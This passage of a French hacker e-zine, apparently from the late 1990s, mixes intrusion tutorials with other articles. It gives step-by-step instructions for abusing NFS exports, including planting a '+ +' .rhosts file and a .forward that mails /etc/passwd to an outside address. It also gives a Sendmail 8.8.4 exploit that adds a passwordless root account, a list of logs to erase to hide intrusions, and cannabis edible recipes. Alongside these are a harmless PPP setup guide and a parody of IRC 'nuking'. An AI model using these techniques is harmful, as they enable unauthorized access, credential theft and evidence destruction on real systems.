internet ... Mais a la difference du ftp o— il faut se logger avec un login et un pass a chaque fois, le NFS permet de mounter tout simplement un disque d'un server sur ton petit pc. Bien sur, n'importe kel blaireau ne peut pas se connecter; cela tiens en fait de l'admin (comme bcp de chose sous unix) et comment qu'il gere son server. Il doit sp‚cifier quels repertoires il veut exporter et … qui. Fini la th‚orie, passons … la d‚monstration ca sera + compr‚hensible (mais j'explique bien non ??) Y'a une commande bien pratique pour voir sur une machine distante les fichiers et repertoires qu'elle exporte, et qui donc peuvent etre mount‚, selon l'user. C.... (suspens).... showmount Et en plus je vous dis comment l'utiliser ! (NdRiTuaL : merci du cadeau ;) Si vous envoyer 3 mail vous recevrez une photo de KayN !!=] (j'suis curieux de voir ca !!) ) # showmount -e www.yoda.org Export list for www.yoda.org /mnt/cdrom (everyone) /export/falcon (solo) Commentation : le -e c pour voir la liste de ce qui est export‚ seulement, et ce qu'il y a ensuite, c'est .... ben le server distant. Ensuite " /mnt/cdrom " est export‚ … tout le monde (" everyone " pour ceux qui comprennent l'anglais ;) et " /export/falcon " est seulement pour " solo ". C pas compilqu‚, si tu comprends pas, je peux plus grand chose pour toi. Mais comme j'ai dis prec‚demment, le NFS permet de 'mettre simplement un disque distant sur son pc' En langage unix : le mounter. Donc on utilise la commande ... (resuspens) .... mount !! c'etais dur! Et je remontre comment qu'on fais : # mount -t nfs www.yoda.org:/usr /mnt/rebellion Descriptation : Pour ceux qui connaissent pas le -t , achetez vous un bouquin sur linux et lisez, parce que c une commande immanquable (comme peugeot... d‚sol‚...). Bon le type : " nfs " bien sur. Ensuite c l'adresse du server distant " www.yoda.org " suivant de " :/mnt/cdrom " c'est … dire le repertoire qu'on veut monter et qui est en everyone. Et finalement, " /mnt/rebellion " le repertoire local o— l'on mount le tout. Maintenant si tu vas voir dans ton /mnt/rebellion tu t'apecevra que le repertoire /mnt/cdrom de www.yoda.org y est ! Magic nan ! Mais ca serait trop simple;de s'arreter ici nan ? Je continue ! En fait, ce qui suis c valable pour n'importe o— n'importe quand, bien sur, y'a les restrictions de lecture, ‚criture ... enfin je vous donne quelques exemples : regardez bien les repertoires o— vous pouvez ‚crire, c la cl‚ de tout! Bien sur c rare, mais en cherchant bien, on trouve. Et ensuite on s'empresse de y laisser un petit .rhosts comme ca, et pourquoi pas un .forward t'en qu'on y est ! pour le .forward doit contenir " |/bin/mail dark@vader.org < /etc/passwd " comme ca, un petit fichier a cracker le .rhosts, lui, doit avoir seulement " + + " ou bien autre chose, tatn que votre nom de domaine y est, c bon. Un petit conseil: vous avez surement deja passez des heures … regarder le fichier que vous avez, a faire des ls, cd .. pis cd x et ls ... faites pareil, mais en plus rapide! en allant directement au endroits sensibles ! c'est … dire /var pour les logs, et recup des pass de conenction, /etc des fois que vous pourriez recup le passwd, etc... Bon, je vais pas tout vous dire non plus! a vous de voir suivant ce que vous voulez, o— vous etes etc... c tres variable, et pis c a vous de decider de votre vie ;) C fini, comme d'hab, c'‚tait pas trop dur je pense, efficace, ca je l'espere, et aussi interessant. Enfin, c pas tout ca mais j'ai autre chose … faire, donc bonne chance, mailez moi pour tout renseignement ou autre, je repondrez dan les limites du possible (c'est a dire si ca me fais pas chier, que j'ai le temps, et que ca m'interesse ;) enfin tentez tjs, on sait jamais. Je n'oublie pas de remercier les membres du groupe (pour ceux qui savent pas qui c, ils sont sit‚s ailleurs, cherchez) sans qui c articles n'aurait pas vu le jour ainsi que pleins d'autre chose. Et aussi Lord, ethan, cali, joebar... tous ceux qui se reconnetront (ben vi, mais si je dis pas, ils sauront pas??), sachez que je vous remercie ;p Allez @+ tout le monde!! Amusez vous bien !!! X==============================X=========X + 8 . L'exploit Sendmail 8.8.4 + Shirker + X==============================X=========X [Now booting linux] ... Too many security fails Please reinstall your RedHat5.2 and don't install Sendmail8.8.4 [Now booting win98] ... Ok no proble......merdeuh nan !!!........(blue screen) --> au p'tain fuck da bill0u Ok presentation de l'exploit sendmail : --------------------------------------- cet exploit cree simplement un raccourci de /etc/passwd a /var/tmp/dead.letter ... simple et efficace quoi ... par contre il vous faut un access sur le seveur a hacker ... Commandes a taper : ------------------- ln /etc/passwd /var/tmp/dead.letter /*lien symbolique*/ telnet target.host 25 mail from: nonexsistent@not.an.actual.host.com rcpt to: nonexsistent@not.as.actual.host.com data lord::0:0:leet shit:/root:/bin/bash . quit Maintenant : ------------ connect en telnet au port 23, log toi en tant que lord, pas de passwd requis et lord a les memes privileges que root :) Si ‡a ne marche pas : --------------------- /var et / sont sur differentes partitions (le lien symbolique ne marche pas entre deux partitions differentes...) /var/tmp n'existe pas ou n'est pas permis en ecriture aux users le serveur a un compte postmaster ou un alias mail, ou dans ces cas le mail ou : leur arrive et n'est pas dans /etc/passwd Greetz: [UtopiA], ToURisT, les ex-membres de TLC, Ackboo <-- pour son putain de site :) RENAUD SECHAN, ... shirker@caramail.com X========================X=================X + 9 . Effacer ses traces + RiTuaL & killer + X========================X=================X Bon le plus souvent si tu veux pas te faire buster ben t'efface tes trace sur system que t'as visiter .. ou tu spoof sinon tu fait les 2 c'est encore mieux ;) Donc avec killer on va lister les endroits o— y'a des logs (de connection, login etc ...) C'est partit Dans : /etc/hosts : se fichier contient une liste d'host qui sont connecter sur le r‚seau. Se fichier peut etre utile lord d'un hacking pour savoir si il est possible d'utiliser rsh, rlogin ... /var/log/secure : contient les log de toute les connection : login, pop3, ftp etc ... /var/log/maillog : log tout se qui se passe dans le demon sendmail /var/log/spooler : log toutes les fois ou qq'un eteint le system (avec shutdown -h now ou halt etc ...)Peut etre utile si vous avez un access direct a l'ordinateur. /var/log/messages : contient tout les message envoyer par le kernel /usr/adm/sulog (ou su_log) : le fichier sulog (ou su_log) est le plus souvent dans /var/adm . C'est les logs de tout les SU qui sont effectuer su le system ... (donc si vous utiliser SU ben ...!) /usr/adm/loginlog ou /usr/adm/acct/loginlog : ben comme son nom l'indique. Se fichier garde une trace des logins.. Se fichier n'existe pas sur tout les systems... /var/log/xferlog : ca c un fichier ke vous allez utiliser car il log ttes les commandes au ftp alors, si vous avez utilise un bug ftp ben n'esitez po. /var/log/sulog : la, sur les machines SlackWare en tt cas, ya les logs des sudo. Ce prog est encore en developpement alors ya bcoup de bugs dessu, cherchez, vous trouverez. /var/lib/httpd/logs/ : ce repertoire est plein de petits logs sympas. Je ss pas si vous allez vous procurer access root par httpd mais voila ou sont les logs /var/log/syslog : un fichier plein de tous les messages envoyes par le kernel. Attention a ce fichier, effecez bien vos traces. Si vous ne laissez deja aucunes traces dans ces fichiers, il est assez dur k'on vous choppe essayez kand meme de vous renseigner ou vont se trouver les logs du programme avec lequel vs vs infiltrez. OK? (NdRiTuaL : Celon votre distribution linux ses fichier ne seron pas au meme endroit ou n'existerons pas ... Par exemple tout les /var/log/... Sont sous red-hat 5.x au minimum...) Bon la c'est le bordel ..!! On a fait sa vite pis killer est partit en vacance donc y'as plus moyen de savoir qui a ecrit quoi ! Donc il est possible que pour le nr 2 on vous reserve cet article mais trier selon les distribution etc... voila si vou voulez qu'on fasse le tri un mail a x-hacker@caramail.com Si on a plus de 10 mail on remet ok.? X======================================X======X + 10. COnnection a internet sous linux + N@-Z + X======================================X======X **********************C*O*N*N*E*C*T*I*O*N*********A*********I*N*T*E*R*N*E*T************* ********************** ***********************************************S*O*U*S************************************** ********************** *LLL III NNN NNN UUU UUU XXX XXX *LLL III NNNNN NNN UUU UUU XXX XXX *LLL III NNNNNNN NNN UUU UUU XXX XXX *LLL III NNN NNNN NNN UUU UUU XXXXX *LLL III NNN NNNN NNN UUU UUU XXXX *LLL III NNN NNNNNNN UUU UUU XXXXX *LLLLLLL III NNN NNNNNN UUUUUUUU XXX XXX *LLLLLLL III NNN NNNNN UUUUUUUU XXX XXX ********************************************************************************************** ******************** IMPORTANT: LISEZ TOUT LE FICHIER AVANT D'EXECUTER LE COMMANDES DECRITES ICI!!!!!! **....** = commantaire … ignorer Se connecter a Internet, beaucoup se disen "facile!", mais savent-ils se connecter sous linux, ou du moins connaissent-ils cet etrange, mais tres utile systeme d'exploitation; moi'j dis que n'importe qui peut se connecter au Web par l'intermediare de Windows95/98/NT (mˆme ceux qui achetent windows pour les nuls...). Beaucoup nous diraient "se connecter a internet sous Linux??? C'est impossible!!!!", HE BIEN NON!!! detrompez vous, il est tout a fait possible de se connecter a Internet sous Linux, d'ailleurs ce n'est pas tres dur, et ce le but de cet article (mon tout premier, mais faut bien commencer par quelque chose...). Tout d'abord, un truc dont on peut se passer, mais ‡a peut toujours servir: nous allons tester votre modem grace … la commande dip; tapez la commande suisvante: shell:~$dip -t DIP>port /dev/ttyS0 **ttyS0 est un exemple; il correspond a COM1, mais vous remplacez par votre port** DIP>term [ Entering TERMINAL mode. Use Ctrl-] to get bacck ] atdt#tel **remplacez #tel par un # de telephone n'importe lequel** Si le modem a decroch‚ c que le test est bon, et que l'on peut passer … la suite, sinon, verifiez le p ort du modem et refaites le test, et sinon, ... , changez de modem? Une Fois le test pass‚, nous allons passer … la configuration du programme qui va vous permettre de vous connecter, j'ai nomm‚: ppp. shell:~$pppsetup Ceci ouvrira une fenetre bleue dont vous ne saurez quoi en faire, mais pas de panik, je suis la pour vous guider... On va suivre le setup pas … pas: -Tout d'abord vous appuyez sur la touche enter pour passer au "compliqu‚" -Ensuite vous arrivez a un truc qui vous demande d'entrer dans le cadre bleu un truc avec "atdt278... "; en fait vous devez entrer dans le cadre "atdt#tel_serveur_de_connection"; la commande atdt sert a decrocher et a marquer un numero de telphone. -ensuite il vous demande le nø de port du modem ki va de cua0 a cua3; la vous voyez... -puis vient la vitesse du modem; vous l'ajusterez au maximum en fonction du la vitesse du votre. -apres, si votre serveur fait du call-back, vous mettez oui, et sinon vous mettez non. -pour le cadre suivant, vous laissez en blanc, car ‡a ne nous sert a rien (du moins pas pour une simple connection... ) -apres entrez le nom de votre serveur (l'adresse) du type machintruc.com -dans cette cas vous entrerez le DNS primaire: #.#.#.# ( 1<#<255) -et finalement le type de connection: *PAP => vieux serveurs *CHAP => version non-Microsoft *MS-CHAP-80 => version Microsoft *SCRIPT => script... Dans tout ‡a, nous allons chiosir MS-CHAP-80 -ensuite apparition d'un cadre qui vous propose 2 choix: *MS-CHAP-SERVER 1 Stand alone *MS-CHAP-SERVER 2 Query domain controller... choisissez le 1 -puis entrez votre login de connection (celui fourni au serveur … chaque connection) -votre code Et c fini pour la configuration de ppp: il vous affiche toute vote config ppp; pour demarrer la connection tapez dans le shell: shell:~$ppp go et il faudra attendre quelque minutes avant que le modem demarre; pour terminer une connection vous devrez taper: shell:~$ppp off Voila pour la partie compliquee de ppp, maintenant passons a la partie la plus simple de cet article: creation d'un script de connection. sachez tout d'abord qu'il existe une maniere manuelle de se connecter sous linux (maniere tres chiante d'ailleurs, c pour cela que l'on fera un script); tapez dans le shell(vous etes prets, paske c tres long...): shell~$pppd connect "/usr/sbin/chat \"\" ATDT#tel_serveur CONNECT \"\" ogin: votre_nom_de login word: votre_mot_de_passe" defaultroute 0.0.0.0:#.#.#.# **#.#.#.#correspond au dns primaire** /dev/ttyS0 ** remplacez ttyS0 par votre # de port** C'est pour eviter de taper cette belle ligne a chaque fois que nous allons creer un script: Creez un nouveau fichier avec joe (ou l'editeur ke vous voulez, mais joe c celui ke je prefere)en tapant: shell:~$joe nom_du_script **moi personnellement je l'appellerait "internet"** une fois le fichier cree, copiez-y LES lignes suivantes: /usr/sbin/pppd connect "/usr/sbin/chat \"\" ATDT#tel_serveur CONNECT \"\" ogin: votre_nom_de login word: votre_mot_de_passe" defaultroute 0.0.0.0:#.#.#.# **#.#.#.#correspond au dns primaire** /dev/ttyS0 ** remplacez ttyS0 par votre # de port** et enregistrez le fichier en appuyant sur les touches Ctrl+K et ensuite Ctrl+X Une fois le fichier sauve, il faut le transformer en executable; pour cela tapez la commande (dans le dossier du script): shell:~$chmod +x nom_du_script **ou chmod +x internet pour ceux qui m'ont ecoute...** Voila, maintenant vous n'avez plus qu'… le copier dans le dossier /usr/sbin/ pour ke vous puissiez l'executer … n'importe kel endroit (que se soit dans /, /home, /root, /...); pour cela tapez la commande suivante: shell:~$cp /dossier_ou_se_trouve_le_script/nom_du_script **ou internet** /usr/sbin/nom_du_script **ou internet** Puis pour vous connecter, vous n'avez plus qu'… taper dans le shell: shell:~$nom_du_script **internet pour ceux qui on fait comme moi** Voila, maintenant avec tout ce ke vous avez appris dans cet article, vous etes capables de vous connecter a Internet sous Linux sans aucun probleme, mais si vous en avez, n'hesitez pas … m'envoyer des E-mail (de + cet article et mon premier, alors, de sur j'ai du foutre des conneries...) Pour finir mon discours, une connection … internet sous linux est trŠs utile car il est impossible d'etre nuke sous ce magnifique systeme d'exploitation, et il assure egalement un securit‚ incroyable au niveau de la securit‚. Sur ces mots, je n'ai plus rien … dire, je ne dirais donc plus rien... A++ N@-Z E-mail: I_Dark_Phoenix_I@hotmail.com IRC: irc.funradio.com #twhc athena.dyndns.org ##opers, #secure-root, #help na-z.dyndns.org #twhc, ##opers GREETZ: Killer -> un bon ami tous le gars du mag mes amis de Buenos Aires """ """" "" St Herblain """ """" "" San Salvador (NdRiTuaL : n'‚ssayer pas d'ecrire a N@-Z car il est mort dans un accident de voiture se sera donc son 1er et son dernier article pour notre mag, voila donc nous lui d‚dions notre 1er E-MAg pour lui rendre un dernier homage en esp‚rant que c'est se qu'il aurait voulu... voila malheureusement je ne le connaissais pas assez pour en dire plus sur lui mais je suis sur que c'‚tais qq'un de tres bien... Voila, repose en paix N@-Z ... RiTuaL.) (NdKayN : A notre plus grande surprise et regret, N@-Z d‚c‚da a peine un mois apr‚s cet article qui fut son premier, et malheuresement son dernier. Je suis assez mal plac‚ pour vous racontez qui il ‚tais, vu que je ne l'ai jamais rencontr‚ et que je ne suis pas trop dou‚ pour ca. Tout ca pour vous dire que nous le regrettons et nous aurions aim‚ avoir beacoup d'autres articles comme celui-ci. A bientot n@-z et See you in hell ! KayN.) (NdKiller: N@-Z pour moa ct un compagnon de travail, de sheet et de tout ce ke vous voulez. Depuis k'il est plus la, le boulot c plus ca. Le delir est fini et N@-Z aussi. Vivant un mec bien, mort, un mec mieux dans ma memoire, pour toujours. Cette dedication au travail, ces dimanches k'il venais travailler pour ke tout soit en ordre, je vous le dis. Ct un grand homme. Je vais partir en Europe la, et un des buts de mon trip c d'aller voir ces parents et presenter en personne mes condoleances, Killer.) X=====================X========X + 11 . Lamer's trip + KayN + X=====================X========X Comment avoir un pc hyper-ultra s‚curis‚ et etre le meilleur WaRL0rD ! Papa et maman t'ont achet‚ un tout nouveau pc pour ton anniversaire. Et ils ne savent pas que tu est un terrible WaRL0rD !! haha ! Alors … toi, sympatisant microsoftien, supporter de l'autorun, je vais te donner des conseils pour que tu prenne soin de ton nouveau jouet et que tu reigne sur la cyberwar du net! D'abord comme tu es un hacker/cracker/phreaker exp‚riment‚ et r‚put‚ (tout tes copains de classe t'admirent), tu approche souvent le danger de pres, et bien sur, c ton pc qui subit en cas d'incident. Alors sur internet, c la cyber-war, et tu est au coeur de la bataille, c pour ca que je vais te dire comment te proteger, afin d'etre encore plus puissant et tu ne craindra plus rien pour regner sur le net et l'irc !! 1. Un cyber-windows pour internet ! Tu ne tourne que sous windows, linux c pour les barbares. Ton fidele mirc a la main avec ton script (versions amelior‚es de 7th sphere, p2r, et autres, tu a fais mieux qu'eux rassembl‚s!) tu defile sur l'irc, et tu recupere pleins de fichiers. Mais attention, c dangereux! C pour cela qu'il faut que tu recupere AVANT TOUT les updates de tout ce que tu as!! va sur www.microsoft.com et l…, mets tout a jour, ton winsock et aussi Internet Explorer. C facile, ils te guident, pendant que ton disque est scann‚s, tu vas chercher a boire, parce que ensuite tu vas regarder la barre de telechargement defiler. C booo!! tout en 3d precalcul‚ windows! Une fois que tu as install‚ tout ca, les autres font deja moins les malins h‚h‚ !! Il est maintenant venu les temps de mettre en action un bon antivirus. SURTOUT ne prends pas ceux que tu pourrait trouver sur internet!! ce sont des virus eux meme la plupart! Court vite a ton Carrefour, Lecler ou Auchan pour acheter le plus cher!! c le meilleur! Profite en pour recuper des logiciels de microsoft, c de la bombe!! Rentre chez toi, et installe tout! haha! Maintenant tu peux prendre n'importe quel fichiers .bmp ou .jpg sans probleme, tu es proteg‚! Il est temps de se preparer a l'irc, lieu actif, et incontournable. Le mieux, c de cacher ton adresse ip, et c pas dur! Il faut que tu te mette a la rechercher un programme pour ca : ipspoof.exe ou dans le genre. C trop trop bien, ca marche impec et l…, les mecs ils sont forts si ils te trouvent! Tu le lance, et tu mets tes infos, ton nom, ton numero de tel ... Surtout, ne prends pas de firewall, c de la merde, ca coute cher, ca sert presque a rien, et ca te bloque. Le pire c que ca bloque ICQ, ce super programme pour chatter et chercher d'autres WaRL0rDz, alors ca serait dommage! Pour te proteger des splits, il te faut deux mirc qui tournent en meme temps, mais sur deux servers differents, comme ca, tu pourra reagir et eviter les takeovers. On va voir, maintenant qu'on est prepar‚, comment ATTHACKER sur l'irc, et montrer ta superiorit‚ de WaRL0rD ! (NdRiTuaL : ha les atthackers !! quel jeu de mot pourri!! remarque c'etais des pur WaRL0rDz je les salut si ils nous lisent ;) 2. Atthacker , toujours atthacker ! Si tu croise des mecs qui t'enervent, ou meme pas, dis leur directement que tu est un WaRL0rD, ca les calme souvent, ils font moins les malins. C comme ca que tu vas faire ta reputation et devenir l'un des maitres de l'irc. Mais au cas o—, je vais t'apprendre les techniques qui feront de toi un mec indomptables qui depasse les lois de l'irc! Tout d'abord, le nuke!! ca c de la bombe baby! Deja tu recupere Winnuke et Icenuke, c deux programes in-dis-pen-sables ! avec ca, t pret pour calmer les petits malins qui se moquent de toi! Bien sur que les admin de l'irc disent que c interdit le nuke, mais apres tout! tu es un WaRL0rD ! alors si il te cherchent les admin, tu les calmeras avec winnuke ! Tu t'entraine a connaitre l'ip du mec : /dns moi_le_lamer et tu vois : Resolve to 127.0.0.1 Alors l…, tu te depeche de mettre 127.0.0.1 dans le champ de ton nuker et tu appuie sur le bouton nuke, et l…, tu regarde le mec deconnecter sur l'irc! Et quand il deconnecte, dis a tout le monde que c toi qui l'a calm‚!! comme ca, ils te respecteront, et auront peur!! haha tu commence a devenir le WaRL0rD du server! je continue comme ca, ta suprematie sera encore + grande. Le mieux, c de te preparer pour faire des takeover : tu demande aux op de n'importe kel chan d'etre op; ca peut marcher! ensuite, des que t op, tu ban tout les op! et tout le monde ensuite!! et l… tu change le topic en : Take0veR bY LaMerMan (lamer@crosoft.com) Comme ca, tout le monde verra que tu a pris le chan!! tout le monde te craindra et tout ce que tu demanderas sera fais ! les avantages d'un WaRL0rD ! Bon, maintenant, il te reste plus qu'a connaitre les chevaux de troies! c des fichiers, qui te permettent de rentrer sur un pc d'un mec!! et oui!! avec ca, tu es un vrai hacker!! un pur! Don tu envoie le fichier a ta victim, et ensuite, tu l'execute toi aussi, comme ca, tu sais comment ca se passe sur son pc, tu te met dans la situation de ta victime! puis ensuite, tu rentre sur son pc grace au controle du troyen et l…, comme tu es un WaRL0rD de la cyber-net-war, tu efface tout! toi le puissant mettre de l'irc! et l…, encore une fois, tu dis a tout le monde, sur tous les chan que c toi qui a hacker le pc du mec grave au cheval de troie et que tu es le meilleur WaRL0rD du server, et que les domines tous, cette bande de larve! HAHAHA !!!! Voil… donc la technique pour devenir un vrai WaRL0rD comme il en existe sur l'irc! Ce sont eux qui dominent, les puissants ! eux qui ont la connaissance, eux qui sont les hacker/cracker/phreaker/carder du monde !!!!! GR33TZ : BlackBird, Fufusoft, Warlock, Boulibang (NdRiTuaL : t'as lu alternative (de galaad) puis lis deathlyby 1 et 2 tu veras sa fait drole !!) -----------------------------------S-T-O-P------------------------------------- PUTAIN!!!!! le trip!!! fumette -> lamer trip !!! mortel!! Bon, je me dois de donner quelques explications : Pour ceux qui aurez pas suivi, et qui sont un peu perdus, c une sorte de parodie. Vous comprenez ?? nan, bon, j'explique: j'en ai TROP TROP TROP marre des LamerZ qui trainent de partout sur l'irc, et qui polluent l'image de la scene francaise Ceux si meme comme BlackBird, Fufusoft, Warlock ou Boulibang (que vous pouvez voir ici irc.funradio.fr: #fufu #hacking-world #atthackers) Ils m'enervent trop, et en faites, j'ai ecris ca (suite a une fumette aros‚e, une parmi tant d'autres...) pour en faite vous montrer leur univers. Je me tiendrais a votre disposition par email pour vous montrer des logs comme preuves si vous doutez de l'existence de cons pareils! (NdRiTuaL : pour les log je vais en mettre un sur notre site le meilleur !!) Bon, en faites, jesuppose qu'ils sont responsables de l'etat actuel de l'underground francais : c a dire po tres actif! Je ressent cet effet qu'ils provoquent, je suis blaz‚ en fait quand je les vois, pourkoi on reste encore l… quand on voit des mecs pareils ???! ben justement!! pour pas qu'ils pourissent tout! en effet, notre soci‚t‚ est deja pourrie, la preuve, on est mis ne marge, et eux, c connards!, ils viennent pourrir un peu plus ce qui nous reste, peut de personnes savent encore faire la difference! Malheuresement! on se tiens donc a faire des magz et d'essayer de se voir sur irc, mais ca devient de + en + dur!!! Alors s'il vous plait!! vous qui pensez comme moi: BOUGEZ VOUS!! putain, meme si c pour ecrire un article de merde, ou meme un mail! montrez que vous etes l…! Si vous faites de la merde, on vous le dira, et l… deux solutions : soit tu te vexe et tu t'enerve -> t un con, essaie de tirer profis de la critique et laisse tomber ou alors reflechis (si tu peux) soit tu comprends -> bosse, lis, pratique, bref ameliore toi et reviens montrer ce que tu a appris, et l…, on jugera que tu n'est pas un lamer En bref, si ce que j'ai ecris plus haut t'a fais rire, et si ce que je viens de te dire sur le lamerz te mets dans le meme etat que moi, bouge toi! et faut qu'on creve ces pourritures!!! Montront ce que nous sommes en vrai et on va quand meme pas laisser notre image se faire degrader comme ca, nan !!! Enfin, c un etat de conscience personnel, comme j'aime bien dire : Tu fais ce que tu veux !! ca parais evident mais c pas si simple ! J'arrete l…! Merci … : RiTuaL et Killer (of course), ethan, calimer0 et tous les autres qui supportent mes opinions contre les lamerz. N'hesitez pas a me mailer a ce sujet, je reponds (en general :) On va pas se quitter sans une petite note d'humour quand meme ?!! KayN to RiTuaL : 3 feuilles should be enough (NdRiTuaL : RiTuaL to KayN : hum I think 5 is more interesting) (reNdRituaL : J'aivais meme pas fait gaffe regardez kess ki a en dessous!) X======================X===========X + 12. Delire and drugs + X-Hacker + X======================X===========X Bon malgr‚s se titre trŠs explicite je vais vous expliquer cette rebrique de notre mag : C'est une id‚e qu'on a eu (KayN & RiTuaL) un soir quand on se racontait nos delire... Puis j'me suis dit qu'on allais faire une rebrique ou nos lecteurs (et nous) pourrons racconter leur delire avec les drugs leur recette aussi (j'vous en donne deja qq'un sympa ;) et KayN vous raconte un de ses delires ) Donc voila vous savez se qui vous attend dans les prochaine ligne et dans le prochain nr... Mais pour le momment : - Le cacao : Humm un bon cacao le matin quand tu te reveille c cool mail un space cacao c'est mieux !! Bon alors y vous faut de quoi effriter un 2-3 feuilles puis faite bouillir du lait quand le lait boue mettez le dans une tasse un verre se que vous voullez puis melanger le tout avec ce que vous avez effriter et rajouter du cacao (votre marque pr‚ferer) dedans et buvez! (vous pouvez attendre que sa refroidisse un peut) pis quand vous avez tout bu et qu'il reste des boulette au fond de la tasse ben mettez un fond d'eau dans le tasse et enfiler vous le reste des boulettes et voila vous patientez environ 1H00 et op! vous vous mangerez un claque =) et celon comme vous l'avez dos‚ le delire dureras entre 4-8 heures... (tout mes pote se foutais de ma guelle quand je leur eai dit "hier soir j'me suis fait un cacao! et CT le delire total!" et un jours je leur ai dit de venir chez moi qu'on en ferais un les mec y ‚tais niquer mais qqchose de grave sa m'a fait rire et depuis y s'en fon un de temps en temps voila ct l'anecdote du jours) RiTuaL - Yahourt : Je suis sur que tout le monde connait le space yahourt mais j'explique quand meme vite fait : Tu prend un yahourt au parfin que tu aimes puis 2 cuielleres un grande et une peitite. Tu effrites bon 2 feuilles puis tu met de l'huile dans la grande cuiellere et tu rajoute le tos par dessus tu chauffes la cuiellere jusqu'a ce que l'huile bout et tu verses le tout dans le yahourt (ouvre le avant cr‚tin ! ;) ) et avec la petite cuiellere tu racle le tos qui reste au fond de la grande cuiellere dans le yahourt puis tu melanges le tout et te le bouffe! Et entre 30min-1H00 aprŠs l'effet arrive... (J'aurais bien decrit les effet produit par le cacao et le yahourt mais perso j'y arrive pas c un delire a part quand tu fume t'es casser a fond mais l… t'a plutot la pˆche t'as envie de delirer a fond etc .. Mais bon si vous voulez savoir vous avez juste a essayer!! =) ) RiTuaL Dans le prochain nr kess qu'y aura dans cette rubrique??? - Histoire du LSD - Nos et vos delires - Plantage par weed_man - plein de recette (enfin !! si vous ete sage ;) - etc .......... X=================X==========X + 13. Nos projets + X-Hacker + X=================X==========X Bon alors je vais vous expliquez je que je compte faire quel son mes projets. Deja notre 1er but est de trouver d'autre membre ayant un niveau correct ou meme des newbies (mais pas de lame qui nuke et qui flood et qui se la pete big hacker car c'est eu qui nuise a la reputation des hackers avec les crasher). Parsque c'est souvent les newbies qui ne se font pas aidez par les autre qui devienne des lamez donc voila se que je pense donc now je vais exposer mon projet : J'aimerais monter un groupe "correct" pas un de ses groupe de lame comme on en trouve plein dans le genre se qui est raconter sur le site d'azerty0 (ackboo) (url://www.multimania.com/azerty0/ (enfin je crois!! ) Je tient aussi a faire de la pub pour un pote qui veux cree un E-Mag sur la programation... Je croit qu'il a commencer un mag mais il en a eu mare paske c'etais le seul presque a ecrire ... Donc voila si vous ete interresser mailer lui : jolou@francemel.com RiTuaL X======================X========X +14. Mot de la fin ... + RiTuaL + X======================X========X Voila au momment ou j'‚crit ses ligne notre 1er mag est presque fini !ouf!!!! Bon je vois pas quoi dire d'autre ... Donc je vous laisse contenplez le somaire du "X-H-M nr2" bientot en vente sur tout les bon distributeur d'E-Zine;) Enfin bon dison que d'apres mes estimations il devrais sortir avant la fin de ses vacance donc au plus tard en septembre (on espŠre!)Bon voila place au somaire : Donc pour nous ecrire : RiTuaL : ritual@caramail.com KayN : kayn@caramail.com killer : o_killer_o@hotmail.com Shirker : shirker@caramail.com (merde c deja au debut du mag :p pas grave) Sinon y'a la boite commune du groupe : x-hacker@caramail.com Dans le prochain nr : Qu'est ce qui a dans les borne EDF ---> RiTuaL Le reseau ECHELON c'est quoi ?? ---> RiTuaL Back Door linux/Unix ---> RiTuaL WWWHack (pas sur...sinon pour le 3) ---> RiTuaL Ne pas se faire choper ---> RiTuaL Linux pour les newbies (suite) ---> RiTuaL Siestes ---> KayN Xplosifs et p‚tards (kaboom :) ---> KayN Exploits des entreprises ---> KayN Apprenez a monter un reso entre 2 Win95 ou 98 ---> Killer IP Masquerading?? hu?? ---> Killer Et les Quotas? C koa> ca marche ? ---> Killer Surement d'autres mais je sais pas encore! ---> killer Delire and drugs ---> nous et vous Article des news membres Heuu voila ! Fini le Nr 1 (NdKayN : pour les blaireaux et les cam‚s, ca veut dire que en dessous, y'a plu rien a lire. Comme dis Ritual + haut, y'a des perdus de partout!) (NdRiTuaL : c vrai) (NdKayN : tu veux avoir le dernier mot?? hein, c ca ?? ben c perdu !!) (NdRiTuaL : Merde tout se que j'ai fais : cr‚e le goupe etc ... Et j'ai pas le doit au dernier mot ??!!) (NdKayN : Ouais, mais sans moi, tu serais rien;) (NdRiTuaL : Sans moi pas de mag ;) ) (NdKayN : sans nous, pas d'articles) (NdRiTuaL : j'en ai marre j'abendone ....) (NdKayN : yes!! je l'ai eu !!) (NdRiTuaL : merde!) (NdKayN : manqu‚ ta ruse l…! ) (NdRiTuaL : Et pourtant c'est moi qui l'ai eu ! ;) ) (NdRiTuaL : c'est bon il fera plus rien il c'est endormis... Donc j'ai gagner!! J'espŠre que notre mag vous a plus... aller @+ ) Je lance un concours ;p le 1er mec qui trouve le rapport entre le nom du groupe et Kevin Mitnick gagne. ..? on vera =) si vous savez pkoi envoyer un mail a : x-hacker@caramail.com The EnD Leader X-Hacker RiTuaL 1er membre recruter killer 2eme menbre (on regrette de l'avoir pris ;) KayN Le lamer solitaire Shirker Un dernier salut a notre ami N@-Z